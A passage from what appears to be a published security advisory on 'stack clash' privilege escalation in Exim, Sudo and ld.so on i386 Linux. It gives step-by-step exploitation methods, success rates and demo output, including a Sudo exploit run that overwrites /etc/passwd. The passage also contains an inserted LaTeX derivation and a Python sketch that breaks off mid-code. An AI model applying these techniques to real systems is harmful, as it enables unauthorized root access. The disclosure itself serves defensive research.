In practice, on Debian 8.5, our final Exim exploit:

- gains eip control in 1 run out of 28, on average;

- takes 2.5 seconds per run (on a 4GB Virtual Machine);

- has a good chance of obtaining a root-shell after 28*2.5 = 70 seconds;

- uses 4GB of memory (2GB in the Exim process, and 2GB in the process
fork()ed by system()).

Debian 8.6

Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: after
gaining eip control in Step 4a (Smash), the probability of successfully
returning-into-libc's system() function is 1/256 (8 bits of entropy --
libraries are randomized in a 1MB range but aligned on 4KB).

Consequently, our final Exim exploit has a good chance of obtaining a
root-shell on Debian 8.6 after 256*28*2.5 seconds = 5 hours (256*28=7168
runs).

As we were drafting this advisory, we tried an alternative approach
against Exim on Debian 8.6: we discovered that its stack is executable,
because it depends on libgnutls-deb0, which depends on libp11-kit, which
depends on libffi, which incorrectly requires an executable GNU_STACK
(CVE-2017-1000376).

Initially, we discarded this approach because our 1GB of -p argument
strings on the stack is not executable (_dl_make_stack_executable() only
mprotect()s the stack below argv[] and envp[]):

41e00000-723d7000 rw-p 00000000 00:00 0 [heap]
802f1000-80334000 rwxp 00000000 00:00 0 [stack]
80334000-bfce6000 rw-p 00000000 00:00 0

and because the stack is randomized in an 8MB range but we do not
control the contents of any large buffer on the executable stack.

Later, we discovered that two 128KB (MAX_ARG_STRLEN) copies of the
LD_PRELOAD environment variable can be allocated onto the executable
stack by ld.so's dl_main() and open_path() functions, automatically
freed upon return from these functions, and re-allocated (but not
overwritten) by Exim's 256KB stack-based group_list[].

In theory, the probability of returning into our shell-code (into these
executable copies of LD_PRELOAD) is 1/32 (2*128KB/8MB), higher than the
1/256 probability of returning-into-libc. In practice, this alternative
Exim exploit has a good chance of obtaining a root-shell after 1174 runs
-- instead of 32*28=896 runs in theory, because the two 128KB copies of
LD_PRELOAD are never perfectly aligned with Exim's 256KB group_list[] --
or 1174*2.5 seconds = 50 minutes.

Debian 9 and 10

Unlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib, a
minor weakness in Linux's ASLR that coincidentally affects Step 1
(Clash) of our stack-clash exploits:

https://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d1fd836dcf00d2028c700c7e44d2c23404062c90

If we set RLIMIT_STACK to RLIM_INFINITY, the kernel still switches to
the legacy bottom-up mmap() layout, and the libraries are randomized in
the 1MB range above the address 0x40000000, but Exim's PIE is randomized
in the 1MB range above the address 0x80000000 and the heap is randomized
in the 32MB range above the PIE's .bss section. As a result:

- the heap is always able to reach the stack, because its growth is
never blocked by the libraries -- the theoretical probability of
gaining eip control is 1/16, the probability calculated by our helper
program;

- the heap clashes with the stack around the address 0xA0000000, because
the initial heap-stack distance is 1GB (0xC0000000-0x80000000) and can
be covered with 512MB of heap memory and 512MB of stack memory.

Remote exploitation

Exim's string_sprintf() or glibc's vfprintf() can be used to remotely
complete Steps 3 and 4 of the stack-clash; and the 256KB group_list[] in
Exim's main() naturally consumes the 128KB of initial stack expansion in
Step 2; but another 256KB group_list[] in Exim's exim_setugid() further
decreases the start address of the stack and prevents us from remotely
completing Step 2 and exploiting Exim.

========================================================================
IV.1.2. Sudo
========================================================================

Introduction

We discovered a vulnerability in Sudo's get_process_ttyname() for Linux:
this function opens "/proc/[pid]/stat" (man proc) and reads the device
number of the tty from field 7 (tty_nr). Unfortunately, these fields are
space-separated and field 2 (comm, the filename of the command) can
contain spaces (CVE-2017-1000367).

For example, if we execute Sudo through the symlink "./ 1 ",
get_process_ttyname() calls sudo_ttyname_dev() to search for the
non-existent tty device number "1" in the built-in search_devs[].

Next, sudo_ttyname_dev() calls the recursive function
sudo_ttyname_scan() to search for this non-existent tty device number
"1" in a breadth-first traversal of "/dev".

Last, we exploit this recursive function during its traversal of the
world-writable "/dev/shm", and allocate hundreds of megabytes of heap
memory from the filesystem (directory pathnames) instead of the stack
(the command-line arguments and environment variables allocated by our
other stack-clash exploits).

Step 1: Clash the stack with the heap

sudo_ttyname_scan() strdup()licates the pathnames of the directories and
sub-directories that it traverses, but does not free() them until it
returns. Each one of these "memleak-chunks" allocates at most 4KB
(PATH_MAX) of heap memory.

Step 2: Move the stack-pointer to the start of the stack

The recursive calls to sudo_ttyname_scan() allocate 4KB (PATH_MAX)
stack-frames that naturally consume the 128KB of initial stack
expansion.

Step 3: Jump over the stack guard-page and into the heap

If the length of a directory pathname reaches 4KB (PATH_MAX),
sudo_ttyname_scan() calls warning(), which calls strerror() and _(),
which call gettext() and allow us to jump over the stack guard-page with
an alloca() of up to 128KB (the LANGUAGE environment variable), as
explained in II.3.3.

Step 4a: Smash the stack with the heap

The self-contained gettext() exploitation method malloc()ates and
memcpy()es a "smashing-chunk" of up to 128KB (the OUTPUT_CHARSET
environment variable) that smashes memcpy()'s stack-frame and
return-address, as explained in II.3.4.

Debian 8.5

Step 1: Clash the stack with the heap

Debian 8.5 is vulnerable to CVE-2016-3672: if we set RLIMIT_STACK to
RLIM_INFINITY, the kernel switches to the legacy bottom-up mmap() layout
and disables the ASLR of Sudo's PIE and libraries, but still the initial
heap-stack distance is randomized and roughly 2GB (0xC0000000-0x40000000
-- the start of the heap is randomized in a 32MB range above 0x40000000,
and the end of the stack is randomized in the 8MB range below
0xC0000000).

To reach the start of the stack with the end of the heap, we allocate
hundreds of megabytes of heap memory from the filesystem (directory
pathnames), and:

- the heap must be able to reach the stack -- on Debian 8.5, Sudo's
libraries occupy about 3MB and hence block the growth of the heap with
a probability of 3MB/32MB ~= 1/11;

- when not blocked by the libraries, the heap must always reach the
stack, even when the initial heap-stack distance is maximal (as
detailed in IV.1.1.);

- we cover half of the initial heap-stack distance with 1GB of heap
memory (the memleak-chunks, strdup()licated directory pathnames);

- we cover the other half of this distance with 1GB of stack memory (the
maximum permitted by the kernel's 1/4 limit on the argument and
environment strings) and thus reduce our on-disk inode usage;

- we redirect sudo_ttyname_scan()'s traversal of /dev to /var/tmp
(through a symlink planted in /dev/shm) to work around the small
number of inodes available in /dev/shm.

After the heap reaches the stack and malloc() switches from brk() to
mmap()s of 1MB:

- the size of the free chunk left over at the end of the heap is a
random variable in the [0B,4KB] range -- 4KB (PATH_MAX) is the
approximate size of a memleak-chunk;

- the final heap-stack distance (between the end of the heap and the
start of the stack) is a random variable in the [8KB,4KB+128KB=132KB]
range -- the size of a memleak-chunk plus 128KB (DEFAULT_TOP_PAD);

- sudo_ttyname_scan() recurses a few more times and therefore allocates
more stack memory, but this stack expansion is blocked by the heap and
crashes into the stack guard-page after 16 recursions on average
(132KB/4KB/2, where 132KB is the maximum final heap-stack distance,
and 4KB is the size of sudo_ttyname_scan()'s stack-frame).

To solve this unexpected problem, we:

- first, redirect sudo_ttyname_scan() to a directory tree "A" in
/var/tmp that recurses and allocates stack memory, but does not
allocate heap memory (each directory level contains only one entry,
the sub-directory that is connected to the next directory level);

- second, redirect sudo_ttyname_scan() to a directory tree "B" in
/var/tmp that recurses and allocates heap memory (each directory level
contains many entries), but does not allocate more stack memory (it
simply consumes the stack memory that was already allocated by the
directory tree "A"): it does not further expand the stack, and does
not crash into the guard-page.

Finally, we increase the speed of our exploit and avoid thousands of
useless recursions:

- in each directory level traversed by sudo_ttyname_scan(), we randomly
modify the names of its sub-directories until the first call to
readdir() returns the only sub-directory that is connected to the next
level of the directory tree (all other sub-directories allocate heap
memory but are otherwise empty);

- we dup2() Sudo's stdout and stderr to a pipe with no readers that
terminates Sudo with a SIGPIPE if sudo_ttyname_scan() calls warning()
and sudo_printf() (a failed exploit attempt, usually because the final
heap-stack distance is much longer or shorter than the guard-page
jump).

Step 2: Move the stack-pointer to the start of the stack

sudo_ttyname_scan() allocates a 4KB (PATH_MAX) stack-based pathbuf[]
that naturally consumes the 128KB of initial stack expansion in fewer
than 128KB/4KB=32 recursive calls.

The recursive calls to sudo_ttyname_scan() allocate less than 8MB of
stack memory: the maximum number of recursions (PATH_MAX / strlen("/a")
= 2K) multiplied by the size of sudo_ttyname_scan()'s stack-frame (4KB).

Step 3: Jump over the stack guard-page and into the heap

The length of the guard-page jump in gettext() is the length of the
LANGUAGE environment variable (at most 128KB, MAX_ARG_STRLEN): we take a
64KB jump, well within the range of the final heap-stack distance; this
jump then lands into the free chunk at the end of the heap, where the
smashing-chunk will be allocated in Step 4a, with a probability of
(smashing-chunk / (memleak-chunk + DEFAULT_TOP_PAD)).

If available, we assign "C.UTF-8" to the LC_ALL environment variable,
and prepend "be" to our 64KB LANGUAGE environment variable, because
these minimal locales do not interfere with our heap feng-shui.

Step 4a: Smash the stack with the heap

In gettext(), the smashing-chunk (a malloc() and memcpy() of the
OUTPUT_CHARSET environment variable) must be allocated into the free
chunk at the end of the heap, where the stack-frame of memcpy() is also
allocated.

First, if the size of our memleak-chunks is exactly 4KB+8B
(PATH_MAX+MALLOC_ALIGNMENT), then:

- the size of the free chunk at the end of the heap is a random variable
in the [0B,4KB] range;

- the size of the free chunks left over at the end of the 1MB mmap()s is
roughly 1MB%(4KB+8B)=2KB.

Second, if the size of our smashing-chunk is about 2KB+256B
(PATH_MAX/2+NAME_MAX), then:

- it is always larger than (and never allocated into) the free chunks at
the end of the 1MB mmap()s;

- it is smaller than (and allocated into) the free chunk at the end of
the heap with a probability of roughly 1-(2KB+256B)/4KB.

Last, in each level of our directory tree "B", sudo_ttyname_scan()
malloc()ates and realloc()ates an array of pointers to sub-directories,
but these realloc()s prevent the smashing-chunk from being allocated
into the free chunk at the end of the heap:

- they create holes in the heap, into which the smashing-chunk may be
allocated;

- they may allocate the free chunk at the end of the heap, into which the
smashing-chunk should be allocated.

To solve these problems, we carefully calculate the number of
sub-directories in each level of our directory tree "B":

- we limit the size of the realloc()s -- and hence the size of the holes
that they create -- to 4KB+2KB:

. either a memleak-chunk is allocated into such a hole, and the
remainder is smaller than the smashing-chunk ("not a fit");

. or such a hole is not allocated, but it is larger than the largest
free chunk at the end of the heap ("a worse fit");

- we gradually reduce the final size of the realloc()s in the last
levels of our directory tree "B", and hence re-allocate the holes
created in the previous levels.

In theory, on Debian 8.5, the probability of gaining control of eip is
approximately 1/148, the product of:

- (Step 1) the probability of reaching the stack with the heap:
1-3MB/32MB;

- (Step 3) the probability of jumping over the stack guard-page and into
the free chunk at the end of the heap: (2KB+256B) / (4KB+8B + 128KB);

- (Step 4a) the probability of allocating the smashing-chunk into the
free chunk at the end of the heap: 1-(2KB+256B)/4KB.

In practice, on Debian 8.5, this Sudo exploit:

- gains eip control in 1 run out of 200, on average;

- takes 2.8 seconds per run (on a 4GB Virtual Machine);

- has a good chance of obtaining a root-shell after 200 * 2.8 seconds =
9 minutes;

- uses 2GB of memory.

Note: we do not return-into-libc's system() in Step 4a because /bin/sh
may be bash, which drops our escalated root privileges upon execution.
Instead, we:

- either return-into-libc's __gconv_find_shlib() function through
find_module(), which loads this function's argument from -0x20(%ebp);

- or return-into-libc's __libc_dlopen_mode() function through
nss_load_library(), which loads this function's argument from
-0x1c(%ebp);

- search the libc for a relative pathname that contains a slash
character (for example, "./fork.c") and pass its address to
__gconv_find_shlib() or __libc_dlopen_mode();

- symlink() our PIE exploit to this pathname, and let Sudo execute our
_init() constructor as root, upon successful exploitation.

Debian 8.6

Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: Sudo's
PIE and libraries are always randomized, even if we set RLIMIT_STACK to
RLIM_INFINITY; the probability of successfully returning-into-libc,
after gaining eip control in Step 4a (Smash), is 1/256.

However, Debian 8.6 is still vulnerable to offset2lib, the minor
weakness in Linux's ASLR that coincidentally affects Step 1 (Clash) of
our stack-clash exploits:

- if we set RLIMIT_STACK to 136MB (MIN_GAP) or less (the default is
8MB), then the initial heap-stack distance (between the start of the
heap and the end of the stack) is minimal, a random variable in the
[96MB,137MB] range;

- instead of allocating 1GB of heap memory and 1GB of stack memory to
clash the stack with the heap, we merely allocate 137MB of heap memory
(directory pathnames from our directory tree "B") and no stack memory.

In theory, on Debian 8.6, the probability of gaining eip control is
1/134 (instead of 1/148 on Debian 8.5) because the growth of the heap is
never blocked by Sudo's libraries; and in practice, this Sudo exploit
takes only 0.15 seconds per run (instead of 2.8 seconds on Debian 8.5).

Independent exploitation

The vulnerability that we discovered in Sudo's get_process_ttyname()
function for Linux (CVE-2017-1000367) is exploitable independently of
its stack-clash repercussions: through this vulnerability, a local user
can pretend that his tty is any character device on the filesystem, and
after two race conditions, he can pretend that his tty is any file on
the filesystem.

On an SELinux-enabled system, if a user is Sudoer for a command that
does not grant him full root privileges, he can overwrite any file on
the filesystem (including root-owned files) with this command's output,
because relabel_tty() (in src/selinux.c) calls open(O_RDWR|O_NONBLOCK)
on his tty and dup2()s it to the command's stdin, stdout, and stderr.

To exploit this vulnerability, we:

- create a directory "/dev/shm/_tmp" (to work around
/proc/sys/fs/protected_symlinks), and a symlink "/dev/shm/_tmp/_tty"
to a non-existent pty "/dev/pts/57", whose device number is 34873;

- run Sudo through a symlink "/dev/shm/_tmp/ 34873 " that spoofs the
device number of this non-existent pty;

- set the flag CD_RBAC_ENABLED through the command-line option "-r role"
(where "role" can be our current role, for example "unconfined_r");

- monitor our directory "/dev/shm/_tmp" (for an IN_OPEN inotify event)
and wait until Sudo opendir()s it (because sudo_ttyname_dev() cannot
find our non-existent pty in "/dev/pts/");

- SIGSTOP Sudo, call openpty() until it creates our non-existent pty,
and SIGCONT Sudo;

- monitor our directory "/dev/shm/_tmp" (for an IN_CLOSE_NOWRITE inotify
event) and wait until Sudo closedir()s it;

- SIGSTOP Sudo, replace the symlink "/dev/shm/_tmp/_tty" to our
now-existent pty with a symlink to the file that we want to overwrite
(for example "/etc/passwd"), and SIGCONT Sudo;

- control the output of the command executed by Sudo (the output that
overwrites "/etc/passwd"):

. either through a command-specific method;

. or through a general method such as "--\nHELLO\nWORLD\n" (by
default, getopt() prints an error message to stderr if it does not
recognize an option character).

To reliably win the two SIGSTOP races, we preempt the Sudo process: we
setpriority() it to the lowest priority, sched_setscheduler() it to
SCHED_IDLE, and sched_setaffinity() it to the same CPU as our exploit.

[***@localhost ~]$ head -n 8 /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt

[***@localhost ~]$ sudo -l
[sudo] password for john:
...
User john may run the following commands on localhost:
(ALL) /usr/bin/sum

[***@localhost ~]$ ./Linux_sudo_CVE-2017-1000367 /usr/bin/sum $'--\nHELLO\nWORLD\n'
[sudo] password for john:

[***@localhost ~]$ head -n 8 /etc/passwd
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.
ogin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

========================================================================
IV.1.3. ld.so "hwcap" exploit
========================================================================

"ld.so and ld-linux.so* find and load the shared libraries needed by a
program, prepare the program to run, and then run it." (man ld.so)

Through ld.so, most SUID and SGID binaries on most i386 Linux
distributions are exploitable. For example: Debian 7, 8, 9, 10; Fedora
23, 24, 25; CentOS 5, 6, 7.

Debian 8.5

Step 1: Clash the stack with anonymous mmap()s

The minimal malloc() implementation in ld.so calls mmap(), not brk(), to
obtain memory from the system, and it never calls munmap(). To reach the
start of the stack with anonymous mmap()s, we:

- set RLIMIT_STACK to RLIM_INFINITY and switch from the default top-down
mmap() layout to the legacy bottom-up mmap() layout;

- cover half of the initial mmap-stack distance
(0xC0000000-0x40000000=2GB) with 1GB of stack memory (the maximum
permitted by the kernel's 1/4 limit on the argument and environment
strings);

- cover the other half of this distance with 1GB of anonymous mmap()s,
through multiple LD_AUDIT environment variables that permanently leak
millions of audit_list structures (CVE-2017-1000366) in
process_envvars() and process_dl_audit() (elf/rtld.c).

Step 2: Move the stack-pointer to the start of the stack

To consume the 128KB of initial stack expansion, we simply pass 128KB of
argv[] and envp[] pointers to execve(), as explained in II.3.2.

Step 3: Jump over the stack guard-page and into the anonymous mmap()s

_dl_init_paths() (elf/dl-load.c), which is called by dl_main() after
process_envvars(), alloca()tes llp_tmp, a stack-based buffer large
enough to hold the LD_LIBRARY_PATH environment variable and any
combination of Dynamic String Token (DST) replacement strings. To
calculate the size of llp_tmp, _dl_init_paths() must:

- first, scan LD_LIBRARY_PATH and count all DSTs ($LIB, $PLATFORM, and
$ORIGIN);

- second, multiply the number of DSTs by the length of the longest DST
replacement string (on Debian, $LIB is replaced by the 18-char-long
"lib/i386-linux-gnu", $PLATFORM by "i386" or "i686", and $ORIGIN by
the pathname of the program's directory, for example "/bin" or
"/usr/sbin" -- the longest DST replacement string is usually
"lib/i386-linux-gnu");

- last, add the length of the original LD_LIBRARY_PATH.

Consequently, if LD_LIBRARY_PATH contains many DSTs that are replaced by
the shortest DST replacement string, then llp_tmp is large but not fully
written to, and can be used to jump over the stack guard-page and into
the anonymous mmap()s.

Our ld.so exploits do not use $ORIGIN because several distributions and
glibc versions ignore it in privileged programs; for example:

2010-12-09 Andreas Schwab <***@redhat.com>

* elf/dl-object.c (_dl_new_object): Ignore origin of privileged
program.

Index: glibc-2.12-2-gc4ccff1/elf/dl-object.c
===================================================================
--- glibc-2.12-2-gc4ccff1.orig/elf/dl-object.c
+++ glibc-2.12-2-gc4ccff1/elf/dl-object.c
@@ -214,6 +214,9 @@ _dl_new_object (char *realname, const ch
out:
new->l_origin = origin;
}
+ else if (INTUSE(__libc_enable_secure) && type == lt_executable)
+ /* The origin of a privileged program cannot be trusted. */
+ new->l_origin = (char *) -1;

return new;
}

Step 4b: Smash an anonymous mmap() with the stack

Before _dl_init_paths() returns to dl_main() and jumps back from the
anonymous mmap()s into the stack, we overwrite the block of mmap()ed
memory malloc()ated by _dl_important_hwcaps() with the contents of the
stack-based buffer llp_tmp.

- The block of memory malloc()ated by _dl_important_hwcaps() is divided
in two:

. The first part (the "hwcap-pointers") is an array of r_strlenpair
structures that point to the hardware-capability strings stored in
the second part of this memory block.

. The second part (the "hwcap-strings") contains strings of
hardware-capabilities that are appended to the pathnames of trusted
directories, such as "/lib/" and "/lib/i386-linux-gnu/", when
open_path() searches for audit libraries (LD_AUDIT), preload
libraries (LD_PRELOAD), or dependent libraries (DT_NEEDED).

For example, on Debian, when open_path() finds "libc.so.6" in
"/lib/i386-linux-gnu/i686/cmov/", "i686/cmov/" is such a
hardware-capability string.

- To overwrite the block of memory malloc()ated by
_dl_important_hwcaps() with the contents of the stack-based buffer
llp_tmp, we divide our LD_LIBRARY_PATH environment variable in two:

. The first, static part (our "good-write") overwrites the first
hardware-capability string with characters that we do control.

. The second, dynamic part (our "bad-write") overwrites the last
hardware-capability strings with characters that we do not control
(the short DST replacement strings that enlarge llp_tmp and allow us
to jump over the stack guard-page).

If our 16-byte-aligned good-write overwrites the 8-byte-aligned first
hardware-capability string with the 8-byte pattern "/../tmp/", and if we
append the trusted directory "/lib" to our LD_LIBRARY_PATH, then (after
_dl_init_paths() returns to dl_main()):

- dlmopen_doit() tries to load an LD_AUDIT library "a" (our memory leak
from Step 1);

- _dl_map_object() searches for "a" in the trusted directory "/lib" from
our LD_LIBRARY_PATH;

- open_path() finds our library "a" in "/lib//../tmp//../tmp//../tmp/"
because we overwrote the first hardware-capability string with the
pattern "/../tmp/";

- dl_open_worker() executes our library's _init() constructor, as root.

In theory, this exploit's probability of success depends on:

- (event A) the size of rtld_search_dirs.dirs[0], an array of
r_search_path_elem structures that are malloc()ated by
_dl_init_paths() after the _dl_important_hwcaps(), and must be
allocated above the stack (below 0xC0000000), not below the stack
where it would interfere with Steps 3 (Jump) and 4b (Smash):

P(A) = 1 - size of rtld_search_dirs.dirs[0] / max stack randomization

- (event B) the size of the hwcap-pointers and the size of our
good-write, which must overwrite the first hardware-capability string,
but not the first hardware-capability pointer (to this string):

P(B|A) = MIN(size of hwcap-pointers, size of good-write) /
(max stack randomization - size of rtld_search_dirs.dirs[0])

- (event C) the size of the hwcap-strings and the size of our bad-write,
which must not write past the end of hwcap-strings; but we guarantee
that size of hwcap-strings >= size of good-write + size of bad-write:

P(C|B) = 1
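Multiplying the three factors shows that, under these formulas, the size of rtld_search_dirs.dirs[0] cancels out. The derivation below uses shorthand introduced here, not in the original:

- R is the max stack randomization;
- d is the size of rtld_search_dirs.dirs[0];
- m is MIN(size of hwcap-pointers, size of good-write).

```latex
P(A)\,P(B \mid A)\,P(C \mid B)
  = \frac{R - d}{R} \cdot \frac{m}{R - d} \cdot 1
  = \frac{m}{R}
```

This holds only while d < R. It has the same form as the approximation given below for the ".dynamic" exploit.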

In practice, we use the LD_HWCAP_MASK environment variable to maximize
this exploit's probability of success, because:

- the size of the hwcap-pointers -- which act as a cushion that absorbs
the excess of good-write without crashing,

- the size of the hwcap-strings -- which act as a cushion that absorbs
the excess of good-write and bad-write without crashing,

- and the size of rtld_search_dirs.dirs[0],

are all proportional to 2^N, where N is the number of supported
hardware-capabilities that we enable in LD_HWCAP_MASK.

For example, on Debian 8.5, this exploit:

- has a 1/151 probability of success;

- takes 5.5 seconds per run (on a 4GB Virtual Machine);

- has a good chance of obtaining a root-shell after 151 * 5.5 seconds =
14 minutes.

Debian 8.6

Unlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672, but
our ld.so "hwcap" exploit is a data-only attack and is not affected by
the ASLR of the libraries and PIEs.

Debian 9 and 10

Unlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib: if we
set RLIMIT_STACK to RLIM_INFINITY, the libraries are randomized above
the address 0x40000000, but the PIE is randomized above 0x80000000
(instead of 0x40000000 before the offset2lib patch).

Unfortunately, we discovered a vulnerability in the offset2lib patch
(CVE-2017-1000370): if the PIE is execve()d with 1GB of argument or
environment strings (the maximum permitted by the kernel's 1/4 limit)
then the stack occupies the address 0x80000000, and the PIE is mapped
above the address 0x40000000 instead, directly below the libraries.
This vulnerability effectively nullifies the offset2lib patch, and
allows us to reuse our Debian 8 exploit against Debian 9 and 10.

$ ./Linux_offset2lib
Run #1...
CVE-2017-1000370 triggered
40076000-40078000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib
40078000-40079000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib
40079000-4009b000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib
4009b000-400c0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so
400c0000-400c1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so
400c1000-400c2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so
400c2000-400c4000 r--p 00000000 00:00 0 [vvar]
400c4000-400c6000 r-xp 00000000 00:00 0 [vdso]
400c6000-400c8000 rw-p 00000000 00:00 0
400cf000-402a3000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so
402a3000-402a4000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
402a4000-402a6000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
402a6000-402a7000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so
402a7000-402aa000 rw-p 00000000 00:00 0
7fcf1000-bfcf2000 rw-p 00000000 00:00 0 [stack]

Caveats

- On Fedora and CentOS, this ld.so "hwcap" exploit fails against
/usr/bin/passwd and /usr/bin/chage (but it works against all other
SUID-root binaries) because of SELinux:

type=AVC msg=audit(1492091008.983:414): avc: denied { execute } for pid=2169 comm="passwd" path="/var/tmp/a" dev="dm-0" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0

type=AVC msg=audit(1492092997.581:487): avc: denied { execute } for pid=2648 comm="chage" path="/var/tmp/a" dev="dm-0" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0

- It fails against recent versions of Sudo that specify an RPATH such as
"/usr/lib/sudo": _dl_map_object() first searches for our LD_AUDIT
library in RPATH, but open_path() fails to find our library in
"/usr/lib/sudo//../tmp/" and crashes as soon as it reaches an
overwritten hwcap-pointer.

This problem can be solved by a 16-byte pattern "///../../../tmp/"
(instead of the 8-byte pattern "/../tmp/") but the exploit's
probability of success would be divided by two.

- On Ubuntu, this ld.so "hwcap" exploit always fails, because of the
following patch:

Description: pro-actively disable LD_AUDIT for setuid binaries, regardless
of where the libraries are loaded from. This is to try to make sure that
CVE-2010-3856 cannot sneak back in. Upstream is unlikely to take this,
since it limits the functionality of LD_AUDIT.
Author: Kees Cook <***@ubuntu.com>

Index: eglibc-2.15/elf/rtld.c
===================================================================
--- eglibc-2.15.orig/elf/rtld.c 2012-05-09 10:05:29.456899131 -0700
+++ eglibc-2.15/elf/rtld.c 2012-05-09 10:38:53.952009069 -0700
@@ -2529,7 +2529,7 @@
while ((p = (strsep) (&str, ":")) != NULL)
if (p[0] != '\0'
&& (__builtin_expect (! __libc_enable_secure, 1)
- || strchr (p, '/') == NULL))
+ ))
{
/* This is using the local malloc, not the system malloc. The
memory can never be freed. */

========================================================================
IV.1.4. ld.so ".dynamic" exploit
========================================================================

To exploit ld.so without the LD_AUDIT memory leak, we rely on a second
vulnerability that we discovered in the offset2lib patch
(CVE-2017-1000371):

if we set RLIMIT_STACK to RLIM_INFINITY, and allocate nearly 1GB of
stack memory (the maximum permitted by the kernel's 1/4 limit on the
argument and environment strings) then the stack grows down to almost
0x80000000, and because the PIE is mapped above 0x80000000, the minimum
distance between the end of the PIE's read-write segment and the start
of the stack is 4KB (the stack guard-page).

$ ./Linux_offset2lib 0x3f800000
Run #1...
Run #2...
Run #3...
...
Run #796...
Run #797...
Run #798...
CVE-2017-1000371 triggered
4007b000-400a0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so
400a0000-400a1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so
400a1000-400a2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so
400a2000-400a4000 r--p 00000000 00:00 0 [vvar]
400a4000-400a6000 r-xp 00000000 00:00 0 [vdso]
400a6000-400a8000 rw-p 00000000 00:00 0
400af000-40283000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so
40283000-40284000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
40284000-40286000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so
40286000-40287000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so
40287000-4028a000 rw-p 00000000 00:00 0
8000a000-8000c000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib
8000c000-8000d000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib
8000d000-8002f000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib
80030000-bf831000 rw-p 00000000 00:00 0 [heap]

Note: in this example, the "[stack]" is incorrectly displayed as the
"[heap]" by show_map_vma() (in fs/proc/task_mmu.c).

This completes Step 1: we clash the stack with the PIE's read-write
segment; we complete the remaining steps as in the "hwcap" exploit:

- Step 2: we consume the initial stack expansion with 128KB of argv[]
and envp[] pointers;

- Step 3: we jump over the stack guard-page and into the PIE's
read-write segment with llp_tmp's alloca() (in _dl_init_paths());

- Step 4b: we smash the PIE's read-write segment with llp_tmp's
good-write and bad-write (in _dl_init_paths()); we can smash the
following sections:

+ .data and .bss: but we discarded this application-specific approach;

+ .got: although protected by Full RELRO (RELocation Read-Only, with
GNU_RELRO and BIND_NOW), the .got is still writable when we smash it
in _dl_init_paths(); however, within ld.so, the .got is written to
but never read from, and we therefore discarded this approach;

+ .dynamic: our favored approach.

On i386, the .dynamic section is an array of Elf32_Dyn structures (an
int32 d_tag, and the union of uint32 d_val and uint32 d_ptr) that
contains entries such as:

- DT_STRTAB, a pointer to the PIE's .dynstr section (a read-only string
table): its d_tag (DT_STRTAB) is read (by elf_get_dynamic_info())
before we smash it in _dl_init_paths(), but its d_ptr is read (by
_dl_map_object_deps()) after we smash it in _dl_init_paths();

- DT_NEEDED, an offset into the .dynstr section: the pathname of a
dependent library that must be loaded by _dl_map_object_deps().

If we overwrite the entire .dynamic section with the following 8-byte
pattern (an Elf32_Dyn structure):

- a DT_NEEDED d_tag,

- a d_val equal to half the address of our own string table on the stack
(16MB of argument strings, enough to defeat the 8MB stack
randomization),

then _dl_map_object_deps() reads the pathname of this dependent library
from DT_STRTAB.d_ptr + DT_NEEDED.d_val = our_strtab/2 + our_strtab/2 =
our_strtab, and loads our own library, as root. This 8-byte pattern is
simple, but poses two problems:

- DT_NEEDED is an int32 equal to 1, but we smash the .dynamic section
with a string copy that cannot contain null-bytes: to solve this first
problem we use DT_AUXILIARY instead, which is equivalent but equal to
0x7ffffffd;

- ld.so crashes before it returns from dl_main() (before it calls
_dl_init() and executes our library's _init() constructor):

. in _dl_map_object_deps() because of our DT_AUXILIARY entry;

. in version_check_doit() because we overwrote the DT_VERNEED entry;

. in _dl_relocate_object() because we overwrote the DT_REL, DT_RELSZ,
and DT_RELCOUNT entries.
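The null-byte problem in the first item above can be illustrated with a small Python sketch. It is a model, not the exploit itself: it packs the 8-byte Elf32_Dyn pattern in i386 little-endian order and checks whether the pattern would survive a NUL-terminated string copy. The d_tag values come from <elf.h>. The names `our_strtab`, `elf32_dyn()` and `survives_string_copy()` are hypothetical, and the address is an arbitrary example chosen so that its half contains no null-byte.

```python
import struct

# d_tag values as defined in <elf.h>.
DT_NEEDED = 1
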